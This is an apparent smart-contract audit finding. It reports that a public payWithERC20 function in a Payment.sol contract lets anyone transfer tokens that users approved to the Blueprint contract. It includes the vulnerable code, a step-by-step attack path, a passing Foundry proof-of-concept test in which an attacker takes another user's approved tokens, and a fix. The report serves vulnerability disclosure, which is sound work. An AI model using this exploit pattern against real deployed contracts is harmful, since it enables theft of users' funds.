Prehistoric Topaz Moose

High

# Public payWithERC20 function will make the attacker steal from users.

### Summary

In Payment.sol

payWithERC20 function is defined as public

https://github.com/sherlock-audit/2025-03-crestal-network/blob/main/crestal-omni-contracts/src/Payment.sol#L25

So attackers can transfer  token of the users that approved to blueprint contract to any address.

### Root Cause

In Payment.sol

```solidity
function payWithERC20(address erc20TokenAddress, uint256 amount, address fromAddress, address toAddress) public {
        // check from and to address
        require(fromAddress != toAddress, "Cannot transfer to self address");
        require(toAddress != address(0), "Invalid to address");
        require(amount > 0, "Amount must be greater than 0");
        IERC20 token = IERC20(erc20TokenAddress);
        token.safeTransferFrom(fromAddress, toAddress, amount);
    }
```

Blueprint inherited the Payment contract and the payWithERC20 function is defined as public.

So all users can call and transfer tokens from users that approved to blueprint contract to any address.




### Internal Pre-conditions

N/A

### External Pre-conditions

N/A

### Attack Path

1. Attacker will check users' allowance to blueprint.
2. If any user has allowance to blueprint, attacker will call payWithERC20 function with the allowance amount and his address as toAddress

### Impact

It's high impact as attacker can steal all tokens that is approved to blueprint.


### PoC

In BlueprintV5.t.sol

- Add following function

```solidity
function test_pay_public() public {
        address user = address(0x01);
        address attacker = address(0x02);

        mockToken.mint(user, 10e18);

        vm.prank(user);
        mockToken.approve(address(blueprint), 5e18);

        vm.prank(attacker);
        blueprint.payWithERC20(address(mockToken), mockToken.allowance(user, address(blueprint)), user, attacker);


        assertEq(mockToken.balanceOf(attacker), 5e18);
    }
```

- Result

[PASS] test_pay_public() (gas: 97551)

- As result shows, attacker stole 5e18 token from user who approved 5e18 to blueprint.

### Mitigation

Need to make payWithERC20 function as private.